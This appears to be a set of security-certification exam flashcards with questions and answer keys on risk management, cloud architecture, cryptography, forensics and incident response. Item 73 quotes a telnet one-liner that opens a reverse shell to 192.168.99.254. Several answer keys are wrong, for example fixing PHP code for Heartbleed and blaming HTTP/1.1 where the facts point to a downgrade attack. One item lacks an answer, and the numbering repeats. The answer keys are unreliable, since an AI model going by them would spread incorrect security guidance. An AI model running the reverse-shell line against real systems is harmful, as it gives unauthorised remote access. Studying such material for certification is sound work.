301-400 Flashcards

1
Q
A security administrator is opening connectivity on a firewall between Organization A and Organization B. Organization B just acquired Organization A.

Which of the following risk mitigation strategies should the administrator implement to reduce the risk involved with this change?

A. DLP on internal network nodes
B. A network traffic analyzer for incoming traffic
C. A proxy server to examine outgoing web traffic
D. IPS/IDS monitoring on the new connection

A

D. IPS/IDS monitoring on the new connection

2
Q

An organization is facing budget constraints. The Chief Technology Officer (CTO) wants to add a new marketing platform, but the organization does not have the resources to obtain separate servers to run the new platform. The CTO recommends running the new marketing platform on a virtualized video-conferencing server because video conferencing is rarely used. The Chief Information Security Officer (CISO) denies this request.

Which of the following BEST explains the reason why the CISO has not approved the request?

A. Privilege escalation attacks
B. Performance and availability
C. Weak DAR encryption
D. Disparate security requirements

A

D. Disparate security requirements

3
Q

A cloud architect needs to isolate the most sensitive portion of the network while maintaining hosting in a public cloud.

Which of the following configurations can be employed to support this effort?

A. Create a single-tenancy security group in the public cloud that hosts only similar types of servers
B. Privatize the cloud by implementing an on-premises instance.
C. Create a hybrid cloud with an on-premises instance for the most sensitive server types.
D. Sandbox the servers with the public cloud by server type

A

A. Create a single-tenancy security group in the public cloud that hosts only similar types of servers

4
Q

A financial services company has proprietary trading algorithms, which were created and are maintained by a team of developers on their private source code repository. If the details of this operation became known to competitors, the company’s ability to profit from its trading would disappear immediately.

Which of the following would the company MOST likely use to protect its trading algorithms?

A. Single-tenancy cloud
B. Managed security service providers
C. Virtual desktop infrastructure
D. Cloud security broker

A

A. Single-tenancy cloud

5
Q

An attacker wants to gain information about a company’s database structure by probing the database listener. The attacker tries to manipulate the company’s database to see if it has any vulnerabilities that can be exploited to help carry out an attack.

To prevent this type of attack, which of the following should the company do to secure its database?

A. Mask the database banner
B. Tighten database authentication and limit table access
C. Harden web and Internet resources
D. Implement challenge-based authentication

A

B. Tighten database authentication and limit table access

6
Q

An organization based in the United States is planning to expand its operations into the European market later in the year. Legal counsel is exploring the additional requirements that must be established as a result of the expansion.

The BEST course of action would be to

A. revise the employee provisioning and deprovisioning procedures
B. complete a quantitative risk assessment
C. draft a memorandum of understanding
D. complete a security questionnaire focused on data privacy.

A

D. complete a security questionnaire focused on data privacy.

7
Q

A security engineer wants to introduce key stretching techniques to the account database to make password guessing attacks more difficult.

Which of the following should be considered to achieve this? (Choose two)

A. Digital signature
B. bcrypt
C. Perfect forward secrecy
D. SHA-256
E. P-384
F. PBKDF2
G. Record-level encryption

A

B and F

8
Q

As part of an organization’s ongoing vulnerability assessment program, the Chief Information Security Officer (CISO) wants to evaluate the organization’s systems, personnel, and facilities for various threats. As part of the assessment, the CISO plans to engage an independent cybersecurity assessment firm to perform social engineering and physical penetration testing against the organization’s corporate offices and remote locations.

Which of the following techniques would MOST likely be employed as part of this assessment? (Choose three.)

A. Privilege escalation
B. SQL injection
C. TOC/TOU exploitation
D. Rogue AP substitution
E. Tailgating
F. Vulnerability scanning
G. Vishing
H. Badge skimming

A

E, G, H

9
Q

A security engineer discovers a PC may have been breached and accessed by an outside agent. The engineer wants to find out how this breach occurred before remediating the damage.

Which of the following should the security engineer do FIRST to begin this investigation?

A. Create an image of the hard drive
B. Capture the incoming and outgoing network traffic
C. Dump the contents of the RAM
D. Parse the PC logs for information on the attacker.

A

C. Dump the contents of the RAM

10
Q

A hospital is using a functional magnetic resonance imaging (fMRI) scanner, which is controlled by a legacy desktop connected to the network. The manufacturer of the fMRI will not support patching of the legacy system. The legacy desktop needs to be network accessible on TCP port 445. A security administrator is concerned the legacy system will be vulnerable to exploits.

Which of the following would be the BEST strategy to reduce the risk of an outage while still providing for security?

A. Install HIDS and disable unused services.
B. Enable application whitelisting and disable SMB.
C. Segment the network and configure a controlled interface
D. Apply only critical security patches for known vulnerabilities.

A

C. Segment the network and configure a controlled interface

11
Q

A Chief Information Security Officer (CISO) has created a survey that will be distributed to managers of mission-critical functions across the organization. The survey requires the managers to determine how long their respective units can operate in the event of an extended IT outage before the organization suffers monetary losses from the outage.

To which of the following is the survey question related? (Choose two.)

A. Risk avoidance
B. Business impact
C. Risk assessment
D. Recovery point objective
E. Recovery time objective
F. Mean time between failures

A

B & E

12
Q

Following a recent security incident on a web server, the security analyst takes HTTP traffic captures for further investigation. The analyst suspects certain jpg files have important data hidden within them.

Which of the following tools will help get all the pictures from within the HTTP traffic captured to a specified folder?

A. tshark
B. memdump
C. nbtstat
D. dd

A

A. tshark

13
Q

A company has completed the implementation of technical and management controls as required by its adopted security policies and standards. The implementation took two years and consumed the budget approved for security projects. The board has denied any further requests for additional budget.

Which of the following should the company do to address the residual risk?

A. Transfer the risk
B. Baseline the risk.
C. Accept the risk
D. Remove the risk

A

C. Accept the risk

14
Q

An e-commerce company that provides payment gateways is concerned about the growing expense and time associated with PCI audits of its payment gateways and external audits by customers for their own compliance reasons. The Chief Information Officer (CIO) asks the security team to provide a list of options that will:

  1. Reduce the overall cost of these audits
  2. Leverage existing infrastructure where possible
  3. Keep infrastructure costs to a minimum
  4. Provide some level of attestation of compliance

Which of the following will BEST address the CIO’s concerns? (Choose two.)

A. Invest in new UBA to detect, report, and remediate attacks faster
B. Segment the network to reduce and limit the audit scope
C. Undertake ISO certification for all core infrastructure including datacenters.
D. Implement a GRC system to track and monitor controls
E. Implement DLP controls on HTTP/HTTPS and email
F. Install EDR agents on all corporate endpoints

A

B & D

15
Q

An employee decides to log into an authorized system. The system does not prompt the employee for authentication prior to granting access to the console, and it cannot authenticate the network resources.

Which of the following attack types can this lead to if it is not mitigated?

A. Memory leak
B. Race condition
C. Smurf
D. Resource exhaustion

A

B. Race condition

16
Q

A company is implementing a new secure identity application, given the following requirements:

  • The cryptographic secrets used in the application must never be exposed to users or the OS
  • The application must work on mobile devices.
  • The application must work with the company’s badge reader system

Which of the following mobile device specifications are required for this design? (Choose two.)

A. Secure element
B. Biometrics
C. UEFI
D. SEAndroid
E. NFC
F. HSM

A

E & F

17
Q

A small firm’s newly created website has several design flaws. The developer created the website to be fully compatible with ActiveX scripts in order to use various digital certificates and trusting certificate authorities. However, vulnerability testing indicates sandboxes were enabled, which restricts the code’s access to resources within the user’s computer.

Which of the following is the MOST likely cause of the error?

A. The developer inadvertently used Java applets.
B. The developer established a corporate account with a non-reputable certification authority.
C. The developer used fuzzy logic to determine how the web browser would respond once ports 80 and 443 were both open
D. The developer did not consider that mobile code would be transmitted across the network.

A

A. The developer inadvertently used Java applets.

18
Q

An organization is integrating an ICS and wants to ensure the system is cyber resilient. Unfortunately, many of the specialized components are legacy systems that cannot be patched. The existing enterprise consists of mission-critical systems that require 99.9% uptime.

To assist in the appropriate design of the system given the constraints, which of the following MUST be assumed?

A. Vulnerable components
B. Operational impact due to attack
C. Time criticality of systems
D. Presence of open-source software

A

A. Vulnerable components

19
Q

The Chief Information Security Officer (CISO) of an organization is concerned with the transmission of cleartext authentication information across the enterprise. A security assessment has been performed and has identified the use of ports 80, 389, and 3268.

Which of the following solutions would BEST address the CISO’s concerns?

A. Disable the ports that are determined to contain authentication information
B. Force HTTPS, enable LDAPS, and disable cleartext global catalog communication.
C. Deploy a VPN between networks that transmits authentication information via cleartext
D. Proxy HTTP traffic and migrate to a more secure directory service

A

B. Force HTTPS, enable LDAPS, and disable cleartext global catalog communication.

19
Q

Two competing companies experienced similar attacks on their networks from various threat actors. To improve response times, the companies wish to share some threat intelligence about the sources and methods of attack. Which of the following business documents would be BEST to document this engagement?

A. Business partnership agreement
B. Memorandum of understanding
C. Service-level agreement
D. Interconnection security agreement

A

D. Interconnection security agreement

20
Q

A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password.

Which of the following describes why this request is a security concern? (Choose two.)

A. The request is evidence that the password is more open to being captured via a keylogger.
B. The request proves that salt has not been added to the password hash, thus making it vulnerable to rainbow tables.
C. The request proves the password is encoded rather than encrypted and thus less secure as it can be easily reversed.
D. The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password.
E. The request proves the password is stored in a reversible format, making it readable by anyone at the bank who is given access.
F. The request proves the password must be in cleartext during transit, making it open to on-path attacks.

A

D & E

21
Q

A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to accomplish this goal?

A. Use cell-level encryption.
B. Mask the data.
C. Implement a DLP solution.
D. Utilize encryption at rest.

A

B. Mask the data.

22
Q

Which of the following BEST describe the importance of maintaining chain of custody in forensic evidence collection? (Choose two.)

A. It increases the likelihood that evidence will be deemed admissible in court.
B. It authenticates personnel who come in contact with evidence after collection.
C. It ensures confidentiality and the need-to-know basis of forensically acquired evidence.
D. It attests to how recently evidence was collected by recording date/time attributes.
E. It provides automated attestation for the integrity of the collected evidence.
F. It ensures the integrity of the collected evidence.

A

A & F

23
Q

An organization collects personal data from its global customers. The organization determines how that data is going to be used, why it is going to be used, and how it is manipulated for business processes.

Which of the following will the organization need in order to comply with GDPR? (Choose two.)

A. Data processor
B. Data custodian
C. Data owner
D. Data steward
E. Data controller
F. Data manager

A

A & E

24
Q

The Chief Executive Officer (CEO) of a small wholesaler with low margins is concerned about the use of a newly developed artificial intelligence algorithm being used in the organization’s marketing tool. The tool can make automated purchasing approval decisions based on data provided by customers and collected from the Internet.

Which of the following is MOST likely the concern? (Choose two.)

A. Required computing power
B. Cost to maintain
C. Customer privacy
D. Adversarial attacks
E. Information bias
F. Customer approval speed

A

C & E

25
Q

An organization recently recovered from an attack that featured an adversary injecting malicious logic into OS bootloaders on endpoint devices. Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the UEFI through the full loading of OS components.

Which of the following TPM structures enables this storage functionality?

A. Endorsement tickets
B. Clock/counter structures
C. Command tag structures with MAC schemes
D. Platform configuration registers

A

D. Platform configuration registers

26
Q

A company created an external, PHP-based web application for its customers. A security researcher reports that the application has the Heartbleed vulnerability.

Which of the following would BEST resolve and mitigate the issue? (Choose two.)

A. Deploying a WAF signature
B. Fixing the PHP code
C. Changing the web server from HTTPS to HTTP
D. Using SSLv3
E. Changing the code from PHP to ColdFusion
F. Updating the OpenSSL library

A

B & F

27
Q

An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime.

Which of the following should the analyst perform?

A. Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics.
B. Implement every solution one at a time in a virtual lab, running a metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best solution based on the best metrics.
C. Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the best metrics.
D. Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.

A

D. Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.

28
Q

An investigator is attempting to determine if recent data breaches may be due to issues with a company’s web server that offers news subscription services. The investigator has gathered the following data:

  • Clients successfully establish TLS connections to web services provided by the server.
  • After establishing the connections, most client connections are renegotiated.
  • The renegotiated sessions use cipher suite TLS_RSA_WITH_NULL_SHA.

Which of the following is the MOST likely root cause?

A. The clients disallow the use of modern cipher suites.
B. The web server is misconfigured to support HTTP/1.1
C. A ransomware payload dropper has been installed.
D. An entity is performing downgrade attacks on path.

A

B. The web server is misconfigured to support HTTP/1.1

29
Q

Which of the following is MOST commonly found in a network SLA contract?

A. Price for extra services
B. Performance metrics
C. Service provider responsibility only
D. Limitation of liability
E. Confidentiality and non-disclosure

A

B. Performance metrics

30
Q

A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gathered the following data:

  • dbadmin last logged in at 7:30 a.m. and logged out at 8:05 a.m.
  • A persistent TCP/6667 connection to the external address was established at 7:55 a.m. The connection is still active.
  • Other than bytes transferred to keep the connection alive, only a few kilobytes of data transfer every hour since the start of the connection.
  • A sample outbound request payload from PCAP showed the ASCII content: “JOIN #community”.

Which of the following is the MOST likely root cause?

A. A SQL injection was used to exfiltrate data from the database server.
B. The system has been hijacked for cryptocurrency mining.
C. A botnet Trojan is installed on the database server.
D. The dbadmin user is consulting the community for help via Internet Relay Chat.

A

C. A botnet Trojan is installed on the database server.

31
Q

Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely?

A. Key escrow
B. TPM
C. Trust models
D. Code signing

A

A. Key escrow

32
Q

In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they:

A. have basic utility coverage, including power and water.
B. provide workstations and read-only domain controllers.
C. are generally the least costly to sustain.
D. are the quickest way to restore business.
E. are geographically separated from the company’s primary facilities.

A

C. are generally the least costly to sustain.

33
Q

During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place.

Which of the following is the MOST likely solution?

A. A WAF to protect web traffic
B. User and entity behavior analytics
C. Requirements to change the local password
D. A gap analysis

A

B. User and entity behavior analytics

34
Q

An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother’s maiden name. When all of these are entered correctly, a new password is emailed to the user.

Which of the following should concern the analyst the MOST?

A. The security answers may be determined via online reconnaissance.
B. The password is too long, which may encourage users to write the password down.
C. The password should include a special character.
D. The minimum password length is too short.

A

A. The security answers may be determined via online reconnaissance.

35
Q

A security researcher has been given an executable that was captured by a honeypot.

Which of the following should the security researcher implement to test the executable?

A. OSINT
B. SAST
C. DAST
D. OWASP

A

C. DAST

36
Q

An executive has decided to move a company’s customer-facing application to the cloud after experiencing a lengthy power outage at a locally managed service provider’s data center. The executive would like a solution that can be implemented as soon as possible.

Which of the following will BEST prevent similar issues when the service is running in the cloud? (Choose two.)

A. Placing the application instances in different availability zones
B. Restoring the snapshot and starting the new application instance from a different zone
C. Enabling autoscaling based on application instance usage
D. Having several application instances running in different VPCs
E. Using the combination of block storage and multiple CDNs in each application instance
F. Setting up application instances in multiple regions

A

A & F

37
Q

A hospitality company experienced a data breach that included customer PII. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service.

Which of the following is the BEST solution to help prevent this type of attack in the future?

A. NGFW for web traffic inspection and activity monitoring
B. CSPM for application configuration control
C. Targeted employee training and awareness exercises
D. CASB for OAuth application permission control

A

C. Targeted employee training and awareness exercises

38
Q

A product manager at a new company needs to ensure the development team produces high quality code on time. The manager has decided to implement an agile development approach instead of waterfall.

Which of the following are reasons to choose an agile development approach? (Choose two.)

A. The product manager gives the developers more autonomy to write quality code prior to deployment.
B. An agile approach incorporates greater application security in the development process than a waterfall approach does.
C. The scope of work is expected to evolve during the lifetime of project development.
D. The product manager prefers to have code iteratively tested throughout development.
E. The product manager would like to produce code in linear phases.
F. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach rather than waterfall.

A

C & D

39
Q

In a cloud environment, the provider offers relief to an organization’s teams by sharing in many of the operational duties.

In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation?

A. Application-specific data assets
B. Application user access management
C. Application-specific logic and code
D. Application/platform software

A

D. Application/platform software

40
Q

A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems. Some of the requirements are:

  • Handle an increase in customer demand of resources
  • Provide quick and easy access to information
  • Provide high-quality streaming media
  • Create a user-friendly interface

Which of the following actions should be taken FIRST?

A. Deploy high-availability web servers.
B. Enhance network access controls.
C. Implement a content delivery network.
D. Migrate to a virtualized environment.

A

C. Implement a content delivery network.

41
Q

In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements.

The current cloud provider that the company is using offers:
- Only multitenant cloud hosting
- Minimal physical security
- Few access controls
- No access to the data center

The following information has been uncovered:
- The company is located in a known floodplain, which flooded last year.
- Government regulations require data to be stored within the country.

Which of the following should be addressed FIRST?

A. Update the disaster recovery plan to account for natural disasters.
B. Establish a new memorandum of understanding with the cloud provider.
C. Establish a new service-level agreement with the cloud provider.
D. Provision services according to the appropriate legal requirements.

A

D. Provision services according to the appropriate legal requirements.

42
Q

A security administrator needs to implement an X.509 solution for multiple sites within the human resources department. This solution would need to secure all subdomains associated with the domain name of the main human resources web server.

Which of the following would need to be implemented to properly secure the sites and provide easier private key management?

A. Certificate revocation list
B. Digital signature
C. Wildcard certificate
D. Registration authority
E. Certificate pinning

A

C. Wildcard certificate

43
Q

An organization’s threat team is creating a model based on a number of incidents in which systems in an air-gapped location are compromised. Physical access to the location and logical access to the systems are limited to administrators and select, approved, on-site company employees.

Which of the following is the BEST strategy to reduce the risks of data exposure?

A. NDAs
B. Mandatory access control
C. NIPS
D. Security awareness training

A

B. Mandatory access control

44
Q

Ubuntu Virtual Sim

A
  1. Log-in
  2. Open Terminal
  3. $ sudo systemctl list-units
  4. Look for the “malicious.service”
  5. $ sudo systemctl disable malicious.service
  6. $ sudo systemctl stop malicious.service
  7. $ sudo systemctl list-units
  8. $ ps -A
  9. $ kill -9 PID
45
Q

An analyst received a list of IOCs from a government agency. The attack has the following characteristics:

  1. The attack starts with bulk phishing.
  2. If a user clicks on the link, a dropper is downloaded to the computer.
  3. Each of the malware samples has unique hashes tied to the user.

The analyst needs to identify whether existing endpoint controls are effective.

Which of the following risk mitigation techniques should the analyst use?

A. Update the incident response plan.
B. Blocklist the executable.
C. Deploy a honeypot onto the laptops.
D. Detonate in a sandbox.

A

D. Detonate in a sandbox.

46
Q

Which of the following BEST describes a common use case for homomorphic encryption?

A. Processing data on a server after decrypting in order to prevent unauthorized access in transit
B. Maintaining the confidentiality of data both at rest and in transit to and from a CSP for processing
C. Transmitting confidential data to a CSP for processing on a large number of resources without revealing information
D. Storing proprietary data across multiple nodes in a private cloud to prevent access by unauthenticated users

A

C. Transmitting confidential data to a CSP for processing on a large number of resources without revealing information

47
Q

A security analyst runs a vulnerability scan on a network administrator’s workstation. The network administrator has direct administrative access to the company’s SSO web portal. The vulnerability scan uncovers critical vulnerabilities with equally high CVSS scores for the user’s browser, OS, email client, and an offline password manager.

Which of the following should the security analyst patch FIRST?

A. Email client
B. Password manager
C. Browser
D. OS

A

B. Password manager

48
Q

An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft.

Which of the following can be used to mitigate this risk?

A. An additional layer of encryption
B. A third-party, data integrity monitoring solution
C. A complete backup that is created before moving the data
D. Additional application firewall rules specific to the migration

A

A. An additional layer of encryption

49
Q

A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity.

Which of the following should the developer implement in the code?

A. RSA
B. OCSP
C. HSTS
D. CRL

A

B. OCSP

50
Q

Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application.

Which of the following MOST likely needs to be done to avoid this in the future?

A. Modify the ACLs.
B. Review the Active Directory.
C. Update the marketing department’s browser.
D. Reconfigure the WAF.

A

A. Modify the ACLs.

51
Q

A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported operating system, but the ICS software running on the server is not compatible with modern operating systems.

Which of the following compensating controls should be implemented to BEST protect the server?

A. Application allow list
B. Antivirus
C. HIPS
D. Host-based firewall

A

D. Host-based firewall

52
Q

A city government’s IT director was notified by the city council that the following cybersecurity requirements must be met to be awarded a large federal grant:

  • Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting.
  • All privileged user access must be tightly controlled and tracked to mitigate compromised accounts.
  • Ransomware threats and zero-day vulnerabilities must be quickly identified.

Which of the following technologies would BEST satisfy these requirements? (Choose three.)

A. Endpoint protection
B. Log aggregator
C. Zero trust network access
D. PAM
E. Cloud sandbox
F. SIEM
G. NGFW

A

B, D, E

53
Q

Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition, Company A is requiring the following:

  • Before the merger is complete, users from both companies should use a single set of usernames and passwords.
  • Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs.
  • Users from Company B should be able to access Company A’s available resources.

Which of the following are the BEST solutions? (Choose two.)

A. Installing new Group Policy Object policies
B. Establishing one-way trust from Company B to Company A
C. Enabling SAML
D. Implementing attribute-based access control
E. Installing Company A’s Kerberos systems in Company B’s network
F. Updating login scripts

A

B & C

54
Q

Prior to a risk assessment inspection, the Chief Information Officer tasked the systems administrator with analyzing and reporting any configuration issues on the information systems, and then verifying existing security settings.

Which of the following would be BEST to use?

A. SCAP
B. CVSS
C. XCCDF
D. CMDB

A

A. SCAP

55
Q

An organization is looking to establish more robust security measures by implementing PKI.

Which of the following should the security analyst implement when considering mutual authentication?

A. Perfect forward secrecy on both endpoints
B. Shared secret for both endpoints
C. Public keys on both endpoints
D. A common public key on each endpoint
E. A common private key on each endpoint

A

C. Public keys on both endpoints

56
Q

An organization’s senior security architect would like to develop cyber defensive strategies based on standardized adversary techniques, tactics, and procedures commonly observed.

Which of the following would BEST support this objective?

A. OSINT analysis
B. The Diamond Model of Intrusion Analysis
C. MITRE ATT&CK
D. Deepfake generation
E. Closed-source intelligence reporting

A

C. MITRE ATT&CK

57
Q

A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect unauthorized code modification.

Which of the following would be BEST for the developer to perform? (Choose two.)

A. Utilize code signing by a trusted third party.
B. Implement certificate-based authentication.
C. Verify MD5 hashes.
D. Compress the program with a password.
E. Encrypt with 3DES.
F. Make the DACL read-only.

A

A & C

58
Q

A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution?

A. Develop an Nmap plug-in to detect the indicator of compromise.
B. Update the organization’s group policy.
C. Include the signature in the vulnerability scanning tool.
D. Deliver an updated threat signature throughout the EDR system.

A

D. Deliver an updated threat signature throughout the EDR system.

59
Q

A company wants to implement a new website that will be accessible via browsers with no mobile applications available. The new website will allow customers to submit sensitive medical information securely and receive online medical advice. The company already has multiple other websites where it provides various public health data and information. The new website must implement the following:

  • The highest form of web identity validation
  • Encryption of all web transactions
  • The strongest encryption in-transit
  • Logical separation based on data sensitivity

Other things that should be considered include:
- The company operates multiple other websites that use encryption.
- The company wants to minimize total expenditure.
- The company wants to minimize complexity.

Which of the following should the company implement on its new website? (Choose two.)

A. Wildcard certificate
B. EV certificate
C. Mutual authentication
D. Certificate pinning
E. SSO
F. HSTS

A

B & F

60
Q

Which of the following is used to assess compliance with internal and external requirements?

A. RACI matrix
B. Audit report
C. After-action report
D. Business continuity plan

A

B. Audit report

61
Q

A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints.

Which of the following processes, if executed, would be MOST likely to expose an attacker?

A. Reviewing video from IP cameras within the facility
B. Reconfiguring the SIEM connectors to collect data from the perimeter network hosts
C. Implementing integrity checks on endpoint computing devices
D. Looking for privileged credential reuse on the network

A

D. Looking for privileged credential reuse on the network

62
Q

A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data.

Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.)

A. EDE
B. CBC
C. GCM
D. AES
E. RSA
F. RC4
G. ECDSA
H. DH

A

C, D, G

63
Q

A security architect is advising the application team to implement the following controls in the application before it is released:
- Least privilege
- Blocklist input validation for the following characters: <>;, =”#+

Based on the requirements, which of the following attacks is the security architect trying to prevent?

A. XML injection
B. LDAP injection
C. CSRF
D. XSS

A

D. XSS

64
Q

A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes.

Which of the following would be BEST to use as part of the process to support copyright protections of the document?

A. Steganography
B. E-signature
C. Watermarking
D. Cryptography

A

A. Steganography

65
Q

A security analyst is using data provided from a recent penetration test to calculate CVSS scores to prioritize remediation.

Which of the following metric groups would the analyst need to determine to get the overall scores? (Choose three.)

A. Temporal
B. Availability
C. Integrity
D. Confidentiality
E. Base
F. Environmental
G. Impact
H. Attack vector

A

A, E, F

66
Q

During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost.

Which of the following should the security analyst have followed?

A. Order of volatility
B. Chain of custody
C. Verification
D. Secure storage

A

A. Order of volatility

67
Q

A global organization’s Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization’s current MPLS-based WAN network to use commodity internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but is a regional provider.

Which of the following is MOST likely identified as a potential risk by the CISO?

A. The SD-WAN provider would not be able to handle the organization’s bandwidth requirements.
B. The operating costs of the MPLS network are too high for the organization.
C. The SD-WAN provider may not be able to support the required troubleshooting and maintenance.
D. Internal IT staff will not be able to properly support remote offices after the migration.

A

C. The SD-WAN provider may not be able to support the required troubleshooting and maintenance.

68
Q

A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web-based application.

The cloud architecture team was given the following requirements:
- The application must run at 70% capacity at all times.
- The application must sustain DoS and DDoS attacks.
- Services must recover automatically.

Which of the following should the cloud architecture team implement? (Choose three.)

A. Read-only replicas
B. BCP
C. Autoscaling
D. WAF
E. CDN
F. Encryption
G. Continuous snapshots
H. Containerization

A

C, D, G

69
Q

A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:

  • Fast scanning
  • The least false positives possible
  • Signature-based
  • A low impact on servers when performing a scan

In addition, the customer has several screened subnets, VLANs, and branch offices.

Which of the following will BEST meet the customer’s needs?

A. Authenticated scanning
B. Passive scanning
C. Unauthenticated scanning
D. Agent-based scanning

A

C. Unauthenticated scanning

70
Q

Real-time, safety-critical systems MOST often use serial busses that:

A. have non-deterministic behavior and are not deployed with encryption.
B. have non-deterministic behavior and are deployed with encryption.
C. have deterministic behavior and are deployed with encryption.
D. have deterministic behavior and are not deployed with encryption.

A

D. have deterministic behavior and are not deployed with encryption.

71
Q

A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code.

Which of the following can the company do to address this finding? (Choose two.)

A. Implement complex, key-length API key management.
B. Implement user session logging.
C. Implement time-based API key management.
D. Use SOAP instead of restful services.
E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets.
F. Enforce MFA on the developers’ workstations and production systems.

A

A & E

72
Q

When a remote employee traveled overseas, the employee’s laptop and several mobile devices with proprietary tools were stolen. The security team requires technical controls be in place to ensure no electronic data is compromised or changed.

Which of the following BEST meets this requirement?

A. Mobile device management with remote wipe capabilities
B. Passwordless smart card authorization with biometrics
C. Next-generation endpoint detection and response agent
D. Full disk encryption with centralized key management

A

D. Full disk encryption with centralized key management

73
Q

A penetration tester inputs the following command:

telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344

This command will allow the penetration tester to establish a:

A. port mirror.
B. network pivot.
C. reverse shell.
D. proxy chain.

A

C. reverse shell.

74
Q

A security engineer is reviewing a record of events after a recent data breach incident that involved the following:

  • A hacker conducted reconnaissance and developed a footprint of the company’s Internet-facing web application assets.
  • A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account.
  • The hacker took advantage of the account’s excessive privileges to access a data store and exfiltrate the data without detection.

Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?

A. Dynamic analysis
B. Secure web gateway
C. Software composition analysis
D. User behavior analysis
E. Stateful firewall

A
75
Q

A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings.

Which of the following resources would the analyst MOST likely adopt?

A. OSINT
B. ISO
C. MITRE ATT&CK
D. OWASP

A

C. MITRE ATT&CK

76
Q

A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role-based access, and one-time authentication.

Which of the following will need to be implemented to achieve this objective? (Choose three.)

A. Least privilege
B. VPN
C. Policy automation
D. PKI
E. Firewall
F. Continuous validation
G. Continuous integration
H. IaaS

A

A, C, F

77
Q

A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company’s infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic.

Which of the following would be the BEST solution to meet these requirements?

A. Block all outbound traffic and implement an inline firewall.
B. Allow only wireless connections and proxy the traffic through a network tap.
C. Establish an air-gapped network and implement an IDS.
D. Use a separate VLAN with an ACL and implement network detection and response.

A

D. Use a separate VLAN with an ACL and implement network detection and response.

78
Q

A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary’s execution. Which of the following tools would BEST support this effort?

A. objdump
B. OllyDbg
C. FTK Imager
D. Ghidra

A

D. Ghidra

79
Q

A software developer was just informed by the security team that the company’s product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes.

Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?

A. Perform supply chain analysis and require third-party suppliers to implement vulnerability management programs.
B. Perform software composition analysis and remediate vulnerabilities found in the software.
C. Perform reverse engineering on the code and rewrite the code in a more secure manner.
D. Perform fuzz testing and implement DAST in the code repositories to find vulnerabilities prior to deployment.

A

B. Perform software composition analysis and remediate vulnerabilities found in the software.

80
Q

A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable.

Which of the following would BEST prevent this scenario from happening again?

A. Performing routine tabletop exercises
B. Implementing scheduled, full interruption tests
C. Backing up system log reviews
D. Performing department disaster recovery walk-throughs

A

B. Implementing scheduled, full interruption tests

81
Q

